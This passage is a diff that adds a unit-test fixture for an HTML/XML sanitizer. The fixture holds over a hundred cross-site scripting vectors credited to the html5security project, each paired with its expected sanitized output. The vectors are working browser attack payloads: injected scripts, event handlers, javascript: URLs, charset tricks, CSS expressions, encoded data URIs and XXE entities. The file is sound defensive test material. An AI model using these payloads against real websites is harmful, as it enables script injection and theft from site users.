1.1 --- /dev/null Thu Jan 01 00:00:00 1970 +0000
1.2 +++ b/parser/xml/test/unit/results.js Wed Dec 31 06:09:35 2014 +0100
1.3 @@ -0,0 +1,844 @@
1.4 +// vectors by the html5security project (https://code.google.com/p/html5security/ & Creative Commons 3.0 BY), see CC-BY-LICENSE for the full license
1.5 +
1.6 +var vectors = [
1.7 + {
1.8 + "data": "<form id=\"test\"></form><button form=\"test\" formaction=\"javascript:alert(1)\">X</button>",
1.9 + "sanitized": "<html><head></head><body></body></html>"
1.10 + },
1.11 + {
1.12 + "data": "<meta charset=\"x-imap4-modified-utf7\">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi",
1.13 + "sanitized": "<html><head></head><body>&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi</body></html>"
1.14 + },
1.15 + {
1.16 + "data": "<meta charset=\"x-imap4-modified-utf7\">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>",
1.17 + "sanitized": "<html><head></head><body>&alert&A7&(1)&R&UA;&&<&A9&11/script&X&></body></html>"
1.18 + },
1.19 + {
1.20 + "data": "0?<script>Worker(\"#\").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))",
1.21 + "sanitized": "<html><head></head><body>0? :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))</body></html>"
1.22 + },
1.23 + {
1.24 + "data": "<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>",
1.25 + "sanitized": "<html><head></head><body></body></html>"
1.26 + },
1.27 + {
1.28 + "data": "<script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>",
1.29 + "sanitized": "<html><head></head><body></body></html>"
1.30 + },
1.31 + {
1.32 + "data": "<input onfocus=write(1) autofocus>",
1.33 + "sanitized": "<html><head></head><body></body></html>"
1.34 + },
1.35 + {
1.36 + "data": "<input onblur=write(1) autofocus><input autofocus>",
1.37 + "sanitized": "<html><head></head><body></body></html>"
1.38 + },
1.39 + {
1.40 + "data": "<a style=\"-o-link:'javascript:alert(1)';-o-link-source:current\">X</a>",
1.41 + "sanitized": "<html><head></head><body><a>X</a></body></html>"
1.42 + },
1.43 + {
1.44 + "data": "<video poster=javascript:alert(1)//></video>",
1.45 + "sanitized": "<html><head></head><body><video controls=\"controls\" poster=\"javascript:alert(1)//\"></video></body></html>"
1.46 + },
1.47 + {
1.48 + "data": "<svg xmlns=\"http://www.w3.org/2000/svg\"><g onload=\"javascript:alert(1)\"></g></svg>",
1.49 + "sanitized": "<html><head></head><body></body></html>"
1.50 + },
1.51 + {
1.52 + "data": "<body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>",
1.53 + "sanitized": "<html><head></head><body><br><br><br><br><br><br>...<br><br><br><br></body></html>"
1.54 + },
1.55 + {
1.56 + "data": "<x repeat=\"template\" repeat-start=\"999999\">0<y repeat=\"template\" repeat-start=\"999999\">1</y></x>",
1.57 + "sanitized": "<html><head></head><body>01</body></html>"
1.58 + },
1.59 + {
1.60 + "data": "<input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>",
1.61 + "sanitized": "<html><head></head><body></body></html>"
1.62 + },
1.63 + {
1.64 + "data": "<script>({0:#0=alert/#0#/#0#(0)})</script>",
1.65 + "sanitized": "<html><head></head><body></body></html>"
1.66 + },
1.67 + {
1.68 + "data": "X<x style=`behavior:url(#default#time2)` onbegin=`write(1)` >",
1.69 + "sanitized": "<html><head></head><body>X</body></html>"
1.70 + },
1.71 + {
1.72 + "data": "<?xml-stylesheet href=\"javascript:alert(1)\"?><root/>",
1.73 + "sanitized": "<html><head></head><body></body></html>"
1.74 + },
1.75 + {
1.76 + "data": "<script xmlns=\"http://www.w3.org/1999/xhtml\">alert(1)</script>",
1.77 + "sanitized": "<html><head></head><body></body></html>"
1.78 + },
1.79 + {
1.80 + "data": "<meta charset=\"x-mac-farsi\">�script �alert(1)//�/script �",
1.81 + "sanitized": "<html><head></head><body>�script �alert(1)//�/script �</body></html>"
1.82 + },
1.83 + {
1.84 + "data": "<script>ReferenceError.prototype.__defineGetter__('name', function(){alert(1)}),x</script>",
1.85 + "sanitized": "<html><head></head><body></body></html>"
1.86 + },
1.87 + {
1.88 + "data": "<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>",
1.89 + "sanitized": "<html><head></head><body></body></html>"
1.90 + },
1.91 + {
1.92 + "data": "<input onblur=focus() autofocus><input>",
1.93 + "sanitized": "<html><head></head><body></body></html>"
1.94 + },
1.95 + {
1.96 + "data": "<form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(2)>X</button>",
1.97 + "sanitized": "<html><head></head><body></body></html>"
1.98 + },
1.99 + {
1.100 + "data": "1<set/xmlns=`urn:schemas-microsoft-com:time` style=`behAvior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=alert(1)>`>",
1.101 + "sanitized": "<html><head></head><body>1</body></html>"
1.102 + },
1.103 + {
1.104 + "data": "<script src=\"#\">{alert(1)}</script>;1",
1.105 + "sanitized": "<html><head></head><body>;1</body></html>"
1.106 + },
1.107 + {
1.108 + "data": "+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);",
1.109 + "sanitized": "<html><head></head><body>+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);</body></html>"
1.110 + },
1.111 + {
1.112 + "data": "<style>p[foo=bar{}*{-o-link:'javascript:alert(1)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>",
1.113 + "sanitized": "<html><head></head><body></body></html>"
1.114 + },
1.115 + {
1.116 + "data": "1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=alert(1)>>",
1.117 + "sanitized": "<html><head></head><body>1</body></html>"
1.118 + },
1.119 + {
1.120 + "data": "<link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d",
1.121 + "sanitized": "<html><head></head><body></body></html>"
1.122 + },
1.123 + {
1.124 + "data": "<style>@import \"data:,*%7bx:expression(write(1))%7D\";</style>",
1.125 + "sanitized": "<html><head></head><body></body></html>"
1.126 + },
1.127 + {
1.128 + "data": "<frameset onload=alert(1)>",
1.129 + "sanitized": "<html><head></head></html>"
1.130 + },
1.131 + {
1.132 + "data": "<table background=\"javascript:alert(1)\"></table>",
1.133 + "sanitized": "<html><head></head><body><table></table></body></html>"
1.134 + },
1.135 + {
1.136 + "data": "<a style=\"pointer-events:none;position:absolute;\"><a style=\"position:absolute;\" onclick=\"alert(1);\">XXX</a></a><a href=\"javascript:alert(2)\">XXX</a>",
1.137 + "sanitized": "<html><head></head><body><a></a><a>XXX</a><a>XXX</a></body></html>"
1.138 + },
1.139 + {
1.140 + "data": "1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=test.vml#xss></vmlframe>",
1.141 + "sanitized": "<html><head></head><body>1</body></html>"
1.142 + },
1.143 + {
1.144 + "data": "1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>",
1.145 + "sanitized": "<html><head></head><body>1<a></a></body></html>"
1.146 + },
1.147 + {
1.148 + "data": "<a style=\"behavior:url(#default#AnchorClick);\" folder=\"javascript:alert(1)\">XXX</a>",
1.149 + "sanitized": "<html><head></head><body><a>XXX</a></body></html>"
1.150 + },
1.151 + {
1.152 + "data": "<!--<img src=\"--><img src=x onerror=alert(1)//\">",
1.153 + "sanitized": "<html><head></head><body><img></body></html>"
1.154 + },
1.155 + {
1.156 + "data": "<comment><img src=\"</comment><img src=x onerror=alert(1)//\">",
1.157 + "sanitized": "<html><head></head><body><img></body></html>"
1.158 + },
1.159 + {
1.160 + "data": "<!-- up to Opera 11.52, FF 3.6.28 -->\r\n<![><img src=\"]><img src=x onerror=alert(1)//\">\r\n\r\n<!-- IE9+, FF4+, Opera 11.60+, Safari 4.0.4+, GC7+ -->\r\n<svg><![CDATA[><image xlink:href=\"]]><img src=xx:x onerror=alert(2)//\"></svg>",
1.161 + "sanitized": "<html><head></head><body><img>\n\n\n><image xlink:href=\"<img></body></html>"
1.162 + },
1.163 + {
1.164 + "data": "<style><img src=\"</style><img src=x onerror=alert(1)//\">",
1.165 + "sanitized": "<html><head></head><body><img></body></html>"
1.166 + },
1.167 + {
1.168 + "data": "<li style=list-style:url() onerror=alert(1)></li>\n<div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div>",
1.169 + "sanitized": "<html><head></head><body><li></li>\n<div></div></body></html>"
1.170 + },
1.171 + {
1.172 + "data": "<head><base href=\"javascript://\"/></head><body><a href=\"/. /,alert(1)//#\">XXX</a></body>",
1.173 + "sanitized": "<html><head></head><body><a>XXX</a></body></html>"
1.174 + },
1.175 + {
1.176 + "data": "<?xml version=\"1.0\" standalone=\"no\"?>\r\n<html xmlns=\"http://www.w3.org/1999/xhtml\">\r\n<head>\r\n<style type=\"text/css\">\r\n@font-face {font-family: y; src: url(\"font.svg#x\") format(\"svg\");} body {font: 100px \"y\";}\r\n</style>\r\n</head>\r\n<body>Hello</body>\r\n</html>",
1.177 + "sanitized": "<html><head>\n\n</head>\n<body>Hello\n</body></html>"
1.178 + },
1.179 + {
1.180 + "data": "<style>*[{}@import'test.css?]{color: green;}</style>X",
1.181 + "sanitized": "<html><head></head><body>X</body></html>"
1.182 + },
1.183 + {
1.184 + "data": "<div style=\"font-family:'foo[a];color:red;';\">XXX</div>",
1.185 + "sanitized": "<html><head></head><body><div>XXX</div></body></html>"
1.186 + },
1.187 + {
1.188 + "data": "<div style=\"font-family:foo}color=red;\">XXX</div>",
1.189 + "sanitized": "<html><head></head><body><div>XXX</div></body></html>"
1.190 + },
1.191 + {
1.192 + "data": "<svg xmlns=\"http://www.w3.org/2000/svg\"><script>alert(1)</script></svg>",
1.193 + "sanitized": "<html><head></head><body></body></html>"
1.194 + },
1.195 + {
1.196 + "data": "<SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT>",
1.197 + "sanitized": "<html><head></head><body></body></html>"
1.198 + },
1.199 + {
1.200 + "data": "<OBJECT CLASSID=\"clsid:333C7BC4-460F-11D0-BC04-0080C7055A83\"><PARAM NAME=\"DataURL\" VALUE=\"javascript:alert(1)\"></OBJECT>",
1.201 + "sanitized": "<html><head></head><body></body></html>"
1.202 + },
1.203 + {
1.204 + "data": "<object data=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\"></object>",
1.205 + "sanitized": "<html><head></head><body></body></html>"
1.206 + },
1.207 + {
1.208 + "data": "<embed src=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\"></embed>",
1.209 + "sanitized": "<html><head></head><body></body></html>"
1.210 + },
1.211 + {
1.212 + "data": "<x style=\"behavior:url(test.sct)\">",
1.213 + "sanitized": "<html><head></head><body></body></html>"
1.214 + },
1.215 + {
1.216 + "data": "<xml id=\"xss\" src=\"test.htc\"></xml>\r\n<label dataformatas=\"html\" datasrc=\"#xss\" datafld=\"payload\"></label>",
1.217 + "sanitized": "<html><head></head><body>\n<label></label></body></html>"
1.218 + },
1.219 + {
1.220 + "data": "<script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>",
1.221 + "sanitized": "<html><head></head><body></body></html>"
1.222 + },
1.223 + {
1.224 + "data": "<video><source onerror=\"alert(1)\">",
1.225 + "sanitized": "<html><head></head><body><video controls=\"controls\"><source></video></body></html>"
1.226 + },
1.227 + {
1.228 + "data": "<video onerror=\"alert(1)\"><source></source></video>",
1.229 + "sanitized": "<html><head></head><body><video controls=\"controls\"><source></video></body></html>"
1.230 + },
1.231 + {
1.232 + "data": "<b <script>alert(1)//</script>0</script></b>",
1.233 + "sanitized": "<html><head></head><body><b>alert(1)//0</b></body></html>"
1.234 + },
1.235 + {
1.236 + "data": "<b><script<b></b><alert(1)</script </b></b>",
1.237 + "sanitized": "<html><head></head><body><b></b></body></html>"
1.238 + },
1.239 + {
1.240 + "data": "<div id=\"div1\"><input value=\"``onmouseover=alert(1)\"></div> <div id=\"div2\"></div><script>document.getElementById(\"div2\").innerHTML = document.getElementById(\"div1\").innerHTML;</script>",
1.241 + "sanitized": "<html><head></head><body><div id=\"div1\"></div> <div id=\"div2\"></div></body></html>"
1.242 + },
1.243 + {
1.244 + "data": "<div style=\"[a]color[b]:[c]red\">XXX</div>",
1.245 + "sanitized": "<html><head></head><body><div>XXX</div></body></html>"
1.246 + },
1.247 + {
1.248 + "data": "<div style=\"\\63	\\06f
\\0006c\\00006F
\\R:\\000072 Ed;color\\0\\bla:yellow\\0\\bla;col\\0\\00 \\ or:blue;\">XXX</div>",
1.249 + "sanitized": "<html><head></head><body><div>XXX</div></body></html>"
1.250 + },
1.251 + {
1.252 + "data": "<!-- IE 6-8 -->\r\n<x '=\"foo\"><x foo='><img src=x onerror=alert(1)//'>\r\n\r\n<!-- IE 6-9 -->\r\n<! '=\"foo\"><x foo='><img src=x onerror=alert(2)//'>\r\n<? '=\"foo\"><x foo='><img src=x onerror=alert(3)//'>",
1.253 + "sanitized": "<html><head></head><body>\n\n\n\n</body></html>"
1.254 + },
1.255 + {
1.256 + "data": "<embed src=\"javascript:alert(1)\"></embed> // O10.10�, OM10.0�, GC6�, FF\r\n<img src=\"javascript:alert(2)\">\r\n<image src=\"javascript:alert(2)\"> // IE6, O10.10�, OM10.0�\r\n<script src=\"javascript:alert(3)\"></script> // IE6, O11.01�, OM10.1�",
1.257 + "sanitized": "<html><head></head><body> // O10.10�, OM10.0�, GC6�, FF\n<img>\n<img> // IE6, O10.10�, OM10.0�\n // IE6, O11.01�, OM10.1�</body></html>"
1.258 + },
1.259 + {
1.260 + "data": "<!DOCTYPE x[<!ENTITY x SYSTEM \"http://html5sec.org/test.xxe\">]><y>&x;</y>",
1.261 + "sanitized": "<!DOCTYPE x[<!entity>\n<html><head></head><body>]>&x;</body></html>"
1.262 + },
1.263 + {
1.264 + "data": "<svg onload=\"javascript:alert(1)\" xmlns=\"http://www.w3.org/2000/svg\"></svg>",
1.265 + "sanitized": "<html><head></head><body></body></html>"
1.266 + },
1.267 + {
1.268 + "data": "<?xml version=\"1.0\"?>\n<?xml-stylesheet type=\"text/xsl\" href=\"data:,%3Cxsl:transform version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='xss'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E\"?>\n<root/>",
1.269 + "sanitized": "<html><head></head><body></body></html>"
1.270 + },
1.271 + {
1.272 + "data": "<!DOCTYPE x [\r\n\t<!ATTLIST img xmlns CDATA \"http://www.w3.org/1999/xhtml\" src CDATA \"xx:x\"\r\n onerror CDATA \"alert(1)\"\r\n onload CDATA \"alert(2)\">\r\n]><img />",
1.273 + "sanitized": "<!DOCTYPE x>\n<html><head></head><body>]><img></body></html>"
1.274 + },
1.275 + {
1.276 + "data": "<doc xmlns:xlink=\"http://www.w3.org/1999/xlink\" xmlns:html=\"http://www.w3.org/1999/xhtml\">\r\n\t<html:style /><x xlink:href=\"javascript:alert(1)\" xlink:type=\"simple\">XXX</x>\r\n</doc>",
1.277 + "sanitized": "<html><head></head><body>\n\tXXX\n</body></html>"
1.278 + },
1.279 + {
1.280 + "data": "<card xmlns=\"http://www.wapforum.org/2001/wml\"><onevent type=\"ontimer\"><go href=\"javascript:alert(1)\"/></onevent><timer value=\"1\"/></card>",
1.281 + "sanitized": "<html><head></head><body></body></html>"
1.282 + },
1.283 + {
1.284 + "data": "<div style=width:1px;filter:glow onfilterchange=alert(1)>x</div>",
1.285 + "sanitized": "<html><head></head><body><div>x</div></body></html>"
1.286 + },
1.287 + {
1.288 + "data": "<// style=x:expression\\28write(1)\\29>",
1.289 + "sanitized": "<html><head></head><body></body></html>"
1.290 + },
1.291 + {
1.292 + "data": "<form><button formaction=\"javascript:alert(1)\">X</button>",
1.293 + "sanitized": "<html><head></head><body></body></html>"
1.294 + },
1.295 + {
1.296 + "data": "<event-source src=\"event.php\" onload=\"alert(1)\">",
1.297 + "sanitized": "<html><head></head><body></body></html>"
1.298 + },
1.299 + {
1.300 + "data": "<a href=\"javascript:alert(1)\"><event-source src=\"data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A\" /></a>",
1.301 + "sanitized": "<html><head></head><body><a></a></body></html>"
1.302 + },
1.303 + {
1.304 + "data": "<script<{alert(1)}/></script </>",
1.305 + "sanitized": "<html><head></head><body></body></html>"
1.306 + },
1.307 + {
1.308 + "data": "<?xml-stylesheet type=\"text/css\"?><!DOCTYPE x SYSTEM \"test.dtd\"><x>&x;</x>",
1.309 + "sanitized": "<!DOCTYPE x SYSTEM \"test.dtd\">\n<html><head></head><body>&x;</body></html>"
1.310 + },
1.311 + {
1.312 + "data": "<?xml-stylesheet type=\"text/css\"?><root style=\"x:expression(write(1))\"/>",
1.313 + "sanitized": "<html><head></head><body></body></html>"
1.314 + },
1.315 + {
1.316 + "data": "<?xml-stylesheet type=\"text/xsl\" href=\"#\"?><img xmlns=\"x-schema:test.xdr\"/>",
1.317 + "sanitized": "<html><head></head><body><img></body></html>"
1.318 + },
1.319 + {
1.320 + "data": "<object allowscriptaccess=\"always\" data=\"test.swf\"></object>",
1.321 + "sanitized": "<html><head></head><body></body></html>"
1.322 + },
1.323 + {
1.324 + "data": "<style>*{x:EXPRESSION(write(1))}</style>",
1.325 + "sanitized": "<html><head></head><body></body></html>"
1.326 + },
1.327 + {
1.328 + "data": "<x xmlns:xlink=\"http://www.w3.org/1999/xlink\" xlink:actuate=\"onLoad\" xlink:href=\"javascript:alert(1)\" xlink:type=\"simple\"/>",
1.329 + "sanitized": "<html><head></head><body></body></html>"
1.330 + },
1.331 + {
1.332 + "data": "<?xml-stylesheet type=\"text/css\" href=\"data:,*%7bx:expression(write(2));%7d\"?>",
1.333 + "sanitized": "<html><head></head><body></body></html>"
1.334 + },
1.335 + {
1.336 + "data": "<x:template xmlns:x=\"http://www.wapforum.org/2001/wml\" x:ontimer=\"$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(1)\"><x:timer value=\"1\"/></x:template>",
1.337 + "sanitized": "<html><head></head><body></body></html>"
1.338 + },
1.339 + {
1.340 + "data": "<x xmlns:ev=\"http://www.w3.org/2001/xml-events\" ev:event=\"load\" ev:handler=\"javascript:alert(1)//#x\"/>",
1.341 + "sanitized": "<html><head></head><body></body></html>"
1.342 + },
1.343 + {
1.344 + "data": "<x xmlns:ev=\"http://www.w3.org/2001/xml-events\" ev:event=\"load\" ev:handler=\"test.evt#x\"/>",
1.345 + "sanitized": "<html><head></head><body></body></html>"
1.346 + },
1.347 + {
1.348 + "data": "<body oninput=alert(1)><input autofocus>",
1.349 + "sanitized": "<html><head></head><body></body></html>"
1.350 + },
1.351 + {
1.352 + "data": "<svg xmlns=\"http://www.w3.org/2000/svg\">\n<a xmlns:xlink=\"http://www.w3.org/1999/xlink\" xlink:href=\"javascript:alert(1)\"><rect width=\"1000\" height=\"1000\" fill=\"white\"/></a>\n</svg>",
1.353 + "sanitized": "<html><head></head><body>\n\n</body></html>"
1.354 + },
1.355 + {
1.356 + "data": "<svg xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\">\n\n<animation xlink:href=\"javascript:alert(1)\"/>\n<animation xlink:href=\"data:text/xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E\"/>\n\n<image xlink:href=\"data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E\"/>\n\n<foreignObject xlink:href=\"javascript:alert(1)\"/>\n<foreignObject xlink:href=\"data:text/xml,%3Cscript xmlns='http://www.w3.org/1999/xhtml'%3Ealert(1)%3C/script%3E\"/>\n\n</svg>",
1.357 + "sanitized": "<html><head></head><body>\n\n\n\n\n\n\n\n\n\n</body></html>"
1.358 + },
1.359 + {
1.360 + "data": "<svg xmlns=\"http://www.w3.org/2000/svg\">\n<set attributeName=\"onmouseover\" to=\"alert(1)\"/>\n<animate attributeName=\"onunload\" to=\"alert(1)\"/>\n</svg>",
1.361 + "sanitized": "<html><head></head><body>\n\n\n</body></html>"
1.362 + },
1.363 + {
1.364 + "data": "<!-- Up to Opera 10.63 -->\r\n<div style=content:url(test2.svg)></div>\r\n\r\n<!-- Up to Opera 11.64 - see link below -->\r\n\r\n<!-- Up to Opera 12.x -->\r\n<div style=\"background:url(test5.svg)\">PRESS ENTER</div>",
1.365 + "sanitized": "<html><head></head><body><div></div>\n\n\n\n\n<div>PRESS ENTER</div></body></html>"
1.366 + },
1.367 + {
1.368 + "data": "[A]\n<? foo=\"><script>alert(1)</script>\">\n<! foo=\"><script>alert(1)</script>\">\n</ foo=\"><script>alert(1)</script>\">\n[B]\n<? foo=\"><x foo='?><script>alert(1)</script>'>\">\n[C]\n<! foo=\"[[[x]]\"><x foo=\"]foo><script>alert(1)</script>\">\n[D]\n<% foo><x foo=\"%><script>alert(1)</script>\">",
1.369 + "sanitized": "<html><head></head><body>[A]\n\">\n\">\n\">\n[B]\n\">\n[C]\n\n[D]\n<% foo></body></html>"
1.370 + },
1.371 + {
1.372 + "data": "<div style=\"background:url(http://foo.f/f oo/;color:red/*/foo.jpg);\">X</div>",
1.373 + "sanitized": "<html><head></head><body><div>X</div></body></html>"
1.374 + },
1.375 + {
1.376 + "data": "<div style=\"list-style:url(http://foo.f)\\20url(javascript:alert(1));\">X</div>",
1.377 + "sanitized": "<html><head></head><body><div>X</div></body></html>"
1.378 + },
1.379 + {
1.380 + "data": "<svg xmlns=\"http://www.w3.org/2000/svg\">\n<handler xmlns:ev=\"http://www.w3.org/2001/xml-events\" ev:event=\"load\">alert(1)</handler>\n</svg>",
1.381 + "sanitized": "<html><head></head><body>\nalert(1)\n</body></html>"
1.382 + },
1.383 + {
1.384 + "data": "<svg xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\">\n<feImage>\n<set attributeName=\"xlink:href\" to=\"data:image/svg+xml;charset=utf-8;base64,\nPHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D\"/>\n</feImage>\n</svg>",
1.385 + "sanitized": "<html><head></head><body>\n\n\n\n</body></html>"
1.386 + },
1.387 + {
1.388 + "data": "<iframe src=mhtml:http://html5sec.org/test.html!xss.html></iframe>\n<iframe src=mhtml:http://html5sec.org/test.gif!xss.html></iframe>",
1.389 + "sanitized": "<html><head></head><body>\n</body></html>"
1.390 + },
1.391 + {
1.392 + "data": "<!-- IE 5-9 -->\r\n<div id=d><x xmlns=\"><iframe onload=alert(1)\"></div>\n<script>d.innerHTML+='';</script>\r\n\r\n<!-- IE 10 in IE5-9 Standards mode -->\r\n<div id=d><x xmlns='\"><iframe onload=alert(2)//'></div>\n<script>d.innerHTML+='';</script>",
1.393 + "sanitized": "<html><head></head><body><div id=\"d\"></div>\n\n\n\n<div id=\"d\"></div>\n</body></html>"
1.394 + },
1.395 + {
1.396 + "data": "<div id=d><div style=\"font-family:'sans\\27\\2F\\2A\\22\\2A\\2F\\3B color\\3Ared\\3B'\">X</div></div>\n<script>with(document.getElementById(\"d\"))innerHTML=innerHTML</script>",
1.397 + "sanitized": "<html><head></head><body><div id=\"d\"><div>X</div></div>\n</body></html>"
1.398 + },
1.399 + {
1.400 + "data": "XXX<style>\r\n\r\n*{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */\r\n\r\n<!--\r\n--><!--*{color:red} /* all UA */\r\n\r\n*{background:url(xx:x //**/\\red/*)} /* IE 6-7 Standards mode */\r\n\r\n</style>",
1.401 + "sanitized": "<html><head></head><body>XXX</body></html>"
1.402 + },
1.403 + {
1.404 + "data": "<img[a][b]src=x[d]onerror[c]=[e]\"alert(1)\">",
1.405 + "sanitized": "<html><head></head><body></body></html>"
1.406 + },
1.407 + {
1.408 + "data": "<a href=\"[a]java[b]script[c]:alert(1)\">XXX</a>",
1.409 + "sanitized": "<html><head></head><body><a>XXX</a></body></html>"
1.410 + },
1.411 + {
1.412 + "data": "<img src=\"x` `<script>alert(1)</script>\"` `>",
1.413 + "sanitized": "<html><head></head><body><img></body></html>"
1.414 + },
1.415 + {
1.416 + "data": "<script>history.pushState(0,0,'/i/am/somewhere_else');</script>",
1.417 + "sanitized": "<html><head></head><body></body></html>"
1.418 + },
1.419 + {
1.420 + "data": "<svg xmlns=\"http://www.w3.org/2000/svg\" id=\"foo\">\r\n<x xmlns=\"http://www.w3.org/2001/xml-events\" event=\"load\" observer=\"foo\" handler=\"data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E alert(1) %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar\"/>\r\n</svg>",
1.421 + "sanitized": "<html><head></head><body>\n\n</body></html>"
1.422 + },
1.423 + {
1.424 + "data": "<iframe src=\"data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03\"></iframe>",
1.425 + "sanitized": "<html><head></head><body></body></html>"
1.426 + },
1.427 + {
1.428 + "data": "<img src onerror /\" '\"= alt=alert(1)//\">",
1.429 + "sanitized": "<html><head></head><body><img></body></html>"
1.430 + },
1.431 + {
1.432 + "data": "<title onpropertychange=alert(1)></title><title title=></title>",
1.433 + "sanitized": "<html><head><title></title><title title=\"\"></title></head><body></body></html>"
1.434 + },
1.435 + {
1.436 + "data": "<!-- IE 5-8 standards mode -->\r\n<a href=http://foo.bar/#x=`y></a><img alt=\"`><img src=xx:x onerror=alert(1)></a>\">\r\n\r\n<!-- IE 5-9 standards mode -->\r\n<!a foo=x=`y><img alt=\"`><img src=xx:x onerror=alert(2)//\">\r\n<?a foo=x=`y><img alt=\"`><img src=xx:x onerror=alert(3)//\">",
1.437 + "sanitized": "<html><head></head><body><a href=\"http://foo.bar/#x=%60y\"></a><img alt=\"`><img src=xx:x onerror=alert(1)></a>\">\n\n\n<img alt=\"`><img src=xx:x onerror=alert(2)//\">\n<img alt=\"`><img src=xx:x onerror=alert(3)//\"></body></html>"
1.438 + },
1.439 + {
1.440 + "data": "<svg xmlns=\"http://www.w3.org/2000/svg\">\n<a id=\"x\"><rect fill=\"white\" width=\"1000\" height=\"1000\"/></a>\n<rect fill=\"white\" style=\"clip-path:url(test3.svg#a);fill:url(#b);filter:url(#c);marker:url(#d);mask:url(#e);stroke:url(#f);\"/>\n</svg>",
1.441 + "sanitized": "<html><head></head><body>\n\n\n</body></html>"
1.442 + },
1.443 + {
1.444 + "data": "<svg xmlns=\"http://www.w3.org/2000/svg\">\r\n<path d=\"M0,0\" style=\"marker-start:url(test4.svg#a)\"/>\r\n</svg>",
1.445 + "sanitized": "<html><head></head><body>\n\n</body></html>"
1.446 + },
1.447 + {
1.448 + "data": "<div style=\"background:url(/f#[a]oo/;color:red/*/foo.jpg);\">X</div>",
1.449 + "sanitized": "<html><head></head><body><div>X</div></body></html>"
1.450 + },
1.451 + {
1.452 + "data": "<div style=\"font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);\">X</div>",
1.453 + "sanitized": "<html><head></head><body><div>X</div></body></html>"
1.454 + },
1.455 + {
1.456 + "data": "<div id=\"x\">XXX</div>\n<style>\n\n#x{font-family:foo[bar;color:green;}\n\n#y];color:red;{}\n\n</style>",
1.457 + "sanitized": "<html><head></head><body><div id=\"x\">XXX</div>\n</body></html>"
1.458 + },
1.459 + {
1.460 + "data": "<x style=\"background:url('x[a];color:red;/*')\">XXX</x>",
1.461 + "sanitized": "<html><head></head><body>XXX</body></html>"
1.462 + },
1.463 + {
1.464 + "data": "<!--[if]><script>alert(1)</script -->\r\n<!--[if<img src=x onerror=alert(2)//]> -->",
1.465 + "sanitized": "<html><head></head><body></body></html>"
1.466 + },
1.467 + {
1.468 + "data": "<div id=\"x\">x</div>\n<xml:namespace prefix=\"t\">\n<import namespace=\"t\" implementation=\"#default#time2\">\n<t:set attributeName=\"innerHTML\" targetElement=\"x\" to=\"<imgsrc=x:xonerror=alert(1)>\">",
1.469 + "sanitized": "<html><head></head><body><div id=\"x\">x</div>\n\n\n</body></html>"
1.470 + },
1.471 + {
